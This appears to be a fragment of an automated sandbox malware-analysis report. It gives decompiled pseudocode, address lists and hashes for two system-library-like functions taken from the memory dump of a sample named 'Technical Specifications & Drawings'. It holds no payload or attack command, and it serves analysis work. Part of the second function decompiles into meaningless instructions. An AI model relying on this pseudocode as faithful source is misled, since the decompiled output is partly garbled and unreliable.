                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: bdf31a2ef1b7901a7b1f316acbe30a071434af6678447c68016fa979cdcecc37
                                                  • Instruction ID: 83d7212b82ed71800bd8ae9310e98044e7e69a9a33f89d75c030a2a634dc2771
                                                  • Opcode Fuzzy Hash: bdf31a2ef1b7901a7b1f316acbe30a071434af6678447c68016fa979cdcecc37
                                                  • Instruction Fuzzy Hash: 2E3104322052159BCB229F19C98CB2AFBE5FF89B24F05055DE557CB245CB74DA04CBC5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017C0050 Relevance: 1.6, APIs: 1, Instructions: 81timeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 53%
                                                  			E017C0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x189d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E017D9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E017EB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E01878A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E017D9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x189b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                  0x017c0055
                                                  0x017c005d
                                                  0x017c0062
                                                  0x017c006c
                                                  0x017c006f
                                                  0x017c0074
                                                  0x017c007a
                                                  0x017c007a
                                                  0x017c0080
                                                  0x017c0080
                                                  0x017c0087
                                                  0x017c008d
                                                  0x017c008f
                                                  0x017c0093
                                                  0x017c0095
                                                  0x017c009b
                                                  0x017c00f8
                                                  0x017c00fb
                                                  0x017c00fc
                                                  0x017c00ff
                                                  0x017c0108
                                                  0x017c0108
                                                  0x017c00a2
                                                  0x017c00a6
                                                  0x017c00b3
                                                  0x017c00bc
                                                  0x017c00c5
                                                  0x017c00ca
                                                  0x0180c01e
                                                  0x00000000
                                                  0x00000000
                                                  0x0180c02d
                                                  0x017c00d5
                                                  0x017c00d9
                                                  0x0180c03d
                                                  0x0180c046
                                                  0x0180c046
                                                  0x017c00df
                                                  0x017c00e2
                                                  0x017c00ea
                                                  0x017c00ef
                                                  0x017c00f2
                                                  0x017c00f6
                                                  0x017c0111
                                                  0x017c0117
                                                  0x017c0117
                                                  0x00000000
                                                  0x017c00f6
                                                  0x017c00d0
                                                  0x017c00d0
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: b160cd4d4389a72520174129176327c39690b780218b291eb8c8f6f6cb509acb
                                                  • Instruction ID: 9532907dc26aee4b1d3b410d567297ffbe412aa286d0ef0cacdaec2aa2f57027
                                                  • Opcode Fuzzy Hash: b160cd4d4389a72520174129176327c39690b780218b291eb8c8f6f6cb509acb
                                                  • Instruction Fuzzy Hash: 47318F35201B04CFD722CF28C844B56F7E5FF89714F1545ADE59687690EB35E901CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017D2581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 84%
                                                  			E017D2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				char _v3;
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t235;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				intOrPtr _t249;
				signed int _t252;
				signed int _t259;
				signed int _t262;
				signed int _t270;
				signed int _t276;
				signed int _t278;
				void* _t280;
				void* _t281;
				signed int _t282;
				unsigned int _t285;
				signed int _t289;
				intOrPtr* _t290;
				signed int _t291;
				signed int _t295;
				intOrPtr _t307;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t323;
				signed int _t324;
				signed int _t326;
				void* _t327;
				signed int _t328;
				signed int _t330;
				signed int _t333;
				void* _t334;
				void* _t336;

				_t330 = _t333;
				_t334 = _t333 - 0x4c;
				_v8 =  *0x189d360 ^ _t330;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t323 = 0x189b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t285 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t336 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t276 = 0x48;
				_t305 = 0 | _t336 == 0x00000000;
				_t316 = 0;
				_v37 = _t336 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t276 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t324 = 0xc0000106;
						goto L32;
					} else {
						_t323 = L017C4620(_t285,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t276);
						_v52 = _t323;
						__eflags = _t323;
						if(_t323 == 0) {
							_t324 = 0xc0000017;
							goto L32;
						} else {
							 *(_t323 + 0x44) =  *(_t323 + 0x44) & 0x00000000;
							_t50 = _t323 + 0x48; // 0x48
							_t318 = _t50;
							_t305 = _v32;
							 *(_t323 + 0x3c) = _t276;
							_t278 = 0;
							 *((short*)(_t323 + 0x30)) = _v48;
							__eflags = _t305;
							if(_t305 != 0) {
								 *(_t323 + 0x18) = _t318;
								__eflags = _t305 - 0x1898478;
								 *_t323 = ((0 | _t305 == 0x01898478) - 0x00000001 & 0xfffffffb) + 7;
								E017EF3E0(_t318,  *((intOrPtr*)(_t305 + 4)),  *_t305 & 0x0000ffff);
								_t305 = _v32;
								_t334 = _t334 + 0xc;
								_t278 = 1;
								__eflags = _a8;
								_t318 = _t318 + (( *_t305 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t270 = E018339F2(_t318);
									_t305 = _v32;
									_t318 = _t270;
								}
							}
							_t289 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t324 = _v68;
								__eflags = 0;
								 *((short*)(_t318 - 2)) = 0;
								goto L32;
							} else {
								_t276 = _t323 + _t278 * 4;
								_v56 = _t276;
								do {
									__eflags = _t305;
									if(_t305 != 0) {
										_t235 =  *(_v60 + _t289 * 4);
										__eflags = _t235;
										if(_t235 == 0) {
											goto L30;
										} else {
											__eflags = _t235 == 5;
											if(_t235 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t276 =  *(_v60 + _t289 * 4);
										 *(_t276 + 0x18) = _t318;
										_t239 =  *(_v60 + _t289 * 4);
										__eflags = _t239 - 8;
										if(__eflags > 0) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t239 * 4 +  &M017D2959))) {
												case 0:
													__ax =  *0x1898488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E017EF3E0(__edi,  *0x189848c, __ax & 0x0000ffff);
														__eax =  *0x1898488 & 0x0000ffff;
														goto L26;
													}
													goto L118;
												case 1:
													L45:
													E017EF3E0(_t318, _v80, _v64);
													_t265 = _v64;
													goto L26;
												case 2:
													 *0x1898480 & 0x0000ffff = E017EF3E0(__edi,  *0x1898484,  *0x1898480 & 0x0000ffff);
													__eax =  *0x1898480 & 0x0000ffff;
													__eax = ( *0x1898480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E017EF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L118;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E017EF3E0(_t318, _v76, _v36);
														_t265 = _v36;
													}
													L26:
													_t334 = _t334 + 0xc;
													_t318 = _t318 + (_t265 >> 1) * 2 + 2;
													__eflags = _t318;
													L27:
													_push(0x3b);
													_pop(_t267);
													 *((short*)(_t318 - 2)) = _t267;
													goto L28;
												case 6:
													__ebx = "\\WWw\\WWw";
													__eflags = __ebx - "\\WWw\\WWw";
													if(__ebx != "\\WWw\\WWw") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E017EF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\WWw\\WWw";
														} while (__ebx != "\\WWw\\WWw");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1898478 & 0x0000ffff = E017EF3E0(__edi,  *0x189847c,  *0x1898478 & 0x0000ffff);
													__eax =  *0x1898478 & 0x0000ffff;
													__eax = ( *0x1898478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E018339F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1896e58 & 0x0000ffff = E017EF3E0(__edi,  *0x1896e5c,  *0x1896e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1896e58 & 0x0000ffff;
													__eax = ( *0x1896e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t289 = _v16;
													_t305 = _v32;
													L29:
													_t276 = _t276 + 4;
													__eflags = _t276;
													_v56 = _t276;
													goto L30;
											}
										}
									}
									goto L118;
									L30:
									_t289 = _t289 + 1;
									_v16 = _t289;
									__eflags = _t289 - _v48;
								} while (_t289 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t239 =  *(_v60 + _t316 * 4);
						if(_t239 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t239 * 4 +  &M017D2935))) {
							case 0:
								__ax =  *0x1898488;
								__eflags = __ax;
								if(__eflags != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t305 =  &_v64;
								_v80 = E017D2E3E(0,  &_v64);
								_t276 = _t276 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1898480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__eflags != 0) {
									__eax = 0x1898480;
									goto L90;
								}
								goto L14;
							case 3:
								__eax = E017BEEF0(0x18979a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L67();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E017BEB70(__ecx, 0x18979a0);
									__eflags = __esi - 0xc0000100;
									if(__eflags == 0) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t213 = _v72;
											__eflags = _t213;
											if(_t213 != 0) {
												L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t213);
											}
											_t214 = _v52;
											__eflags = _t214;
											if(_t214 != 0) {
												__eflags = _t324;
												if(_t324 < 0) {
													L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t214);
													_t214 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t285 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1897b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L017C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E017BEB70(__ecx, 0x18979a0);
										__eax = _v52;
										L36:
										_pop(_t317);
										_pop(_t325);
										__eflags = _v8 ^ _t330;
										_pop(_t277);
										return E017EB640(_t214, _t277, _v8 ^ _t330, _t305, _t317, _t325);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L67();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L118;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t272 = _v56;
								if(_v56 != 0) {
									_t305 =  &_v36;
									_t274 = E017D2E3E(_t272,  &_v36);
									_t285 = _v36;
									_v76 = _t274;
								}
								if(_t285 == 0) {
									goto L44;
								} else {
									_t276 = _t276 + 2 + _t285;
								}
								goto L14;
							case 6:
								__eax =  *0x1895764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1898478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__eflags != 0) {
									__eax = 0x1898478;
									L90:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1896e58 & 0x0000ffff;
								__eax = ( *0x1896e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t316 = _t316 + 1;
								if(_t316 >= _v48) {
									goto L16;
								} else {
									_t305 = _v37;
									goto L1;
								}
								goto L118;
						}
					}
					L56:
					_t290 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					if(__eflags < 0) {
						asm("o16 sub [ebp+0x1], bh");
					}
					_t105 =  &_v3;
					 *_t105 = _v3 - _t276;
					__eflags =  *_t105;
					asm("loopne 0x29");
					if(__eflags < 0) {
						if (__eflags >= 0) goto L62;
					}
					if(__eflags < 0) {
						_t323 = _t323 + 1;
						__eflags = _t323;
					}
					_v3 = _v3 - _t276;
					_pop(_t280);
					 *_t290 =  *_t290 + 0x17d2894;
					_v3 = _v3 - _t318;
					 *(_t239 + 0x1f017d26 ^ 0x0201815b) =  *(_t239 + 0x1f017d26 ^ 0x0201815b) - 0x7d;
					_t326 = _t323 + _t323;
					__eflags = _t326;
					asm("daa");
					if(_t326 < 0) {
						_push(ds);
					}
					_v3 = _v3 - _t280;
					_t327 = _t326 - 1;
					_t113 =  &_v3;
					 *_t113 = _v3 - _t280;
					__eflags =  *_t113;
					asm("daa");
					if( *_t113 < 0) {
						asm("fcomp dword [ebx-0x7f]");
					}
					_pop(_t281);
					 *_t290 =  *_t290 + 0x17d28b4;
					 *_t290 =  *_t290 + 0xcccccccc;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x187ff00);
					E017FD08C(_t281, _t318, _t327);
					_v44 =  *[fs:0x18];
					_t319 = 0;
					 *_a24 = 0;
					_t282 = _a12;
					__eflags = _t282;
					if(_t282 == 0) {
						_t245 = 0xc0000100;
					} else {
						_v8 = 0;
						_t328 = 0xc0000100;
						_v52 = 0xc0000100;
						_t247 = 4;
						while(1) {
							_v40 = _t247;
							__eflags = _t247;
							if(_t247 == 0) {
								break;
							}
							_t295 = _t247 * 0xc;
							_v48 = _t295;
							__eflags = _t282 -  *((intOrPtr*)(_t295 + 0x1781664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t262 = E017EE5C0(_a8,  *((intOrPtr*)(_t295 + 0x1781668)), _t282);
									_t334 = _t334 + 0xc;
									__eflags = _t262;
									if(__eflags == 0) {
										_t328 = E018251BE(_t282,  *((intOrPtr*)(_v48 + 0x178166c)), _a16, _t319, _t328, __eflags, _a20, _a24);
										_v52 = _t328;
										break;
									} else {
										_t247 = _v40;
										goto L72;
									}
									goto L80;
								} else {
									L72:
									_t247 = _t247 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t328;
						__eflags = _t328;
						if(_t328 < 0) {
							__eflags = _t328 - 0xc0000100;
							if(_t328 == 0xc0000100) {
								_t291 = _a4;
								__eflags = _t291;
								if(_t291 != 0) {
									_v36 = _t291;
									__eflags =  *_t291 - _t319;
									if( *_t291 == _t319) {
										_t328 = 0xc0000100;
										goto L86;
									} else {
										_t307 =  *((intOrPtr*)(_v44 + 0x30));
										_t249 =  *((intOrPtr*)(_t307 + 0x10));
										__eflags =  *((intOrPtr*)(_t249 + 0x48)) - _t291;
										if( *((intOrPtr*)(_t249 + 0x48)) == _t291) {
											__eflags =  *(_t307 + 0x1c);
											if( *(_t307 + 0x1c) == 0) {
												L116:
												_t328 = E017D2AE4( &_v36, _a8, _t282, _a16, _a20, _a24);
												_v32 = _t328;
												__eflags = _t328 - 0xc0000100;
												if(_t328 != 0xc0000100) {
													goto L79;
												} else {
													_t319 = 1;
													_t291 = _v36;
													goto L85;
												}
											} else {
												_t252 = E017B6600( *(_t307 + 0x1c));
												__eflags = _t252;
												if(_t252 != 0) {
													goto L116;
												} else {
													_t291 = _a4;
													goto L85;
												}
											}
										} else {
											L85:
											_t328 = E017D2C50(_t291, _a8, _t282, _a16, _a20, _a24, _t319);
											L86:
											_v32 = _t328;
											goto L79;
										}
									}
									goto L118;
								} else {
									E017BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t328 = _a24;
									_t259 = E017D2AE4( &_v36, _a8, _t282, _a16, _a20, _t328);
									_v32 = _t259;
									__eflags = _t259 - 0xc0000100;
									if(_t259 == 0xc0000100) {
										_v32 = E017D2C50(_v36, _a8, _t282, _a16, _a20, _t328, 1);
									}
									_v8 = _t319;
									E017D2ACB();
								}
							}
						}
						L79:
						_v8 = 0xfffffffe;
						_t245 = _t328;
					}
					L80:
					return E017FD0D1(_t245);
				}
				L118:
			}






















































                                                  0x017d2584
                                                  0x017d2586
                                                  0x017d2590
                                                  0x017d2596
                                                  0x017d2597
                                                  0x017d2598
                                                  0x017d2599
                                                  0x017d259e
                                                  0x017d25a4
                                                  0x017d25a9
                                                  0x017d25ac
                                                  0x017d25ae
                                                  0x017d25b1
                                                  0x017d25b2
                                                  0x017d25b5
                                                  0x017d25b8
                                                  0x017d25bb
                                                  0x017d25bc
                                                  0x017d25bf
                                                  0x017d25c2
                                                  0x017d25c5
                                                  0x017d25c6
                                                  0x017d25cb
                                                  0x017d25ce
                                                  0x017d25d8
                                                  0x017d25db
                                                  0x017d25dd
                                                  0x017d25de
                                                  0x017d25e1
                                                  0x017d25e3
                                                  0x017d25e9
                                                  0x017d26da
                                                  0x017d26da
                                                  0x017d26dd
                                                  0x017d26e2
                                                  0x01815b56
                                                  0x00000000
                                                  0x017d26e8
                                                  0x017d26f9
                                                  0x017d26fb
                                                  0x017d26fe
                                                  0x017d2700
                                                  0x01815b60
                                                  0x00000000
                                                  0x017d2706
                                                  0x017d2706
                                                  0x017d270a
                                                  0x017d270a
                                                  0x017d270d
                                                  0x017d2713
                                                  0x017d2716
                                                  0x017d2718
                                                  0x017d271c
                                                  0x017d271e
                                                  0x01815b6c
                                                  0x01815b6f
                                                  0x01815b7f
                                                  0x01815b89
                                                  0x01815b8e
                                                  0x01815b93
                                                  0x01815b96
                                                  0x01815b9c
                                                  0x01815ba0
                                                  0x01815ba3
                                                  0x01815bab
                                                  0x01815bb0
                                                  0x01815bb3
                                                  0x01815bb3
                                                  0x01815ba3
                                                  0x017d2724
                                                  0x017d2726
                                                  0x017d2729
                                                  0x017d272c
                                                  0x017d279d
                                                  0x017d279d
                                                  0x017d27a0
                                                  0x017d27a2
                                                  0x00000000
                                                  0x017d272e
                                                  0x017d272e
                                                  0x017d2731
                                                  0x017d2734
                                                  0x017d2734
                                                  0x017d2736
                                                  0x01815bc1
                                                  0x01815bc1
                                                  0x01815bc4
                                                  0x00000000
                                                  0x01815bca
                                                  0x01815bca
                                                  0x01815bcd
                                                  0x00000000
                                                  0x01815bd3
                                                  0x00000000
                                                  0x01815bd3
                                                  0x01815bcd
                                                  0x017d273c
                                                  0x017d273c
                                                  0x017d2742
                                                  0x017d2747
                                                  0x017d274a
                                                  0x017d274d
                                                  0x017d2750
                                                  0x00000000
                                                  0x017d2756
                                                  0x017d2756
                                                  0x00000000
                                                  0x017d2902
                                                  0x017d2908
                                                  0x017d290b
                                                  0x00000000
                                                  0x017d2911
                                                  0x017d291c
                                                  0x017d2921
                                                  0x00000000
                                                  0x017d2921
                                                  0x00000000
                                                  0x00000000
                                                  0x017d2880
                                                  0x017d2887
                                                  0x017d288c
                                                  0x00000000
                                                  0x00000000
                                                  0x017d2805
                                                  0x017d280a
                                                  0x017d2814
                                                  0x017d2816
                                                  0x00000000
                                                  0x00000000
                                                  0x017d281e
                                                  0x017d2821
                                                  0x017d2823
                                                  0x00000000
                                                  0x017d2829
                                                  0x017d2829
                                                  0x017d2831
                                                  0x017d283c
                                                  0x017d283e
                                                  0x00000000
                                                  0x017d283e
                                                  0x00000000
                                                  0x00000000
                                                  0x017d284e
                                                  0x017d2850
                                                  0x017d2851
                                                  0x017d2854
                                                  0x017d2857
                                                  0x017d285a
                                                  0x017d285c
                                                  0x017d285d
                                                  0x00000000
                                                  0x00000000
                                                  0x017d275d
                                                  0x017d2761
                                                  0x00000000
                                                  0x017d2767
                                                  0x017d276e
                                                  0x017d2773
                                                  0x017d2773
                                                  0x017d2776
                                                  0x017d2778
                                                  0x017d277e
                                                  0x017d277e
                                                  0x017d2781
                                                  0x017d2781
                                                  0x017d2783
                                                  0x017d2784
                                                  0x00000000
                                                  0x00000000
                                                  0x01815bd8
                                                  0x01815bde
                                                  0x01815be4
                                                  0x01815be6
                                                  0x01815be8
                                                  0x01815be9
                                                  0x01815bee
                                                  0x01815bf8
                                                  0x01815bff
                                                  0x01815c01
                                                  0x01815c04
                                                  0x01815c07
                                                  0x01815c0b
                                                  0x01815c0d
                                                  0x01815c0d
                                                  0x01815c15
                                                  0x01815c18
                                                  0x01815c1b
                                                  0x01815c1b
                                                  0x01815c1e
                                                  0x00000000
                                                  0x00000000
                                                  0x017d28c3
                                                  0x017d28c8
                                                  0x017d28d2
                                                  0x017d28d4
                                                  0x017d28d8
                                                  0x017d28db
                                                  0x01815c26
                                                  0x01815c28
                                                  0x01815c2d
                                                  0x01815c2d
                                                  0x00000000
                                                  0x00000000
                                                  0x01815c34
                                                  0x01815c36
                                                  0x01815c49
                                                  0x01815c4e
                                                  0x01815c54
                                                  0x01815c5b
                                                  0x01815c5d
                                                  0x01815c60
                                                  0x017d2788
                                                  0x017d2788
                                                  0x017d278b
                                                  0x017d278e
                                                  0x017d278e
                                                  0x017d278e
                                                  0x017d2791
                                                  0x00000000
                                                  0x00000000
                                                  0x017d2756
                                                  0x017d2750
                                                  0x00000000
                                                  0x017d2794
                                                  0x017d2794
                                                  0x017d2795
                                                  0x017d2798
                                                  0x017d2798
                                                  0x00000000
                                                  0x017d2734
                                                  0x017d272c
                                                  0x017d2700
                                                  0x017d25ef
                                                  0x017d25ef
                                                  0x017d25ef
                                                  0x017d25f2
                                                  0x017d25f8
                                                  0x00000000
                                                  0x00000000
                                                  0x017d25fe
                                                  0x00000000
                                                  0x017d28e6
                                                  0x017d28ec
                                                  0x017d28ef
                                                  0x017d28f5
                                                  0x017d28f8
                                                  0x017d28f8
                                                  0x00000000
                                                  0x017d28f8
                                                  0x00000000
                                                  0x00000000
                                                  0x017d2866
                                                  0x017d2866
                                                  0x017d2876
                                                  0x017d2879
                                                  0x00000000
                                                  0x00000000
                                                  0x017d27e0
                                                  0x017d27e7
                                                  0x017d27e9
                                                  0x017d27eb
                                                  0x01815afd
                                                  0x00000000
                                                  0x01815afd
                                                  0x00000000
                                                  0x00000000
                                                  0x017d2633
                                                  0x017d2638
                                                  0x017d263b
                                                  0x017d263c
                                                  0x017d263e
                                                  0x017d2640
                                                  0x017d2642
                                                  0x017d2647
                                                  0x017d2649
                                                  0x017d264e
                                                  0x017d2650
                                                  0x017d2653
                                                  0x017d2659
                                                  0x017d26a2
                                                  0x017d26a7
                                                  0x017d26ac
                                                  0x017d26b2
                                                  0x01815b11
                                                  0x01815b15
                                                  0x01815b17
                                                  0x00000000
                                                  0x017d26b8
                                                  0x017d26b8
                                                  0x017d26ba
                                                  0x017d27a6
                                                  0x017d27a6
                                                  0x017d27a9
                                                  0x017d27ab
                                                  0x017d27b9
                                                  0x017d27b9
                                                  0x017d27be
                                                  0x017d27c1
                                                  0x017d27c3
                                                  0x017d27c5
                                                  0x017d27c7
                                                  0x01815c74
                                                  0x01815c79
                                                  0x01815c79
                                                  0x017d27c7
                                                  0x00000000
                                                  0x017d26c0
                                                  0x017d26c0
                                                  0x017d26c3
                                                  0x017d26c6
                                                  0x017d26c6
                                                  0x017d26c9
                                                  0x017d26c9
                                                  0x00000000
                                                  0x017d26c9
                                                  0x017d26ba
                                                  0x017d265b
                                                  0x017d265b
                                                  0x017d265e
                                                  0x017d2667
                                                  0x017d266d
                                                  0x017d2677
                                                  0x017d267c
                                                  0x017d267f
                                                  0x017d2681
                                                  0x01815b49
                                                  0x01815b4e
                                                  0x017d27cd
                                                  0x017d27d0
                                                  0x017d27d1
                                                  0x017d27d2
                                                  0x017d27d4
                                                  0x017d27dd
                                                  0x017d2687
                                                  0x017d2687
                                                  0x017d268a
                                                  0x017d268b
                                                  0x017d268e
                                                  0x017d268f
                                                  0x017d2691
                                                  0x017d2696
                                                  0x017d2698
                                                  0x017d269d
                                                  0x017d269f
                                                  0x00000000
                                                  0x017d269f
                                                  0x017d2681
                                                  0x00000000
                                                  0x00000000
                                                  0x017d2846
                                                  0x00000000
                                                  0x00000000
                                                  0x017d2605
                                                  0x017d260a
                                                  0x017d260c
                                                  0x017d2611
                                                  0x017d2616
                                                  0x017d2619
                                                  0x017d2619
                                                  0x017d261e
                                                  0x00000000
                                                  0x017d2624
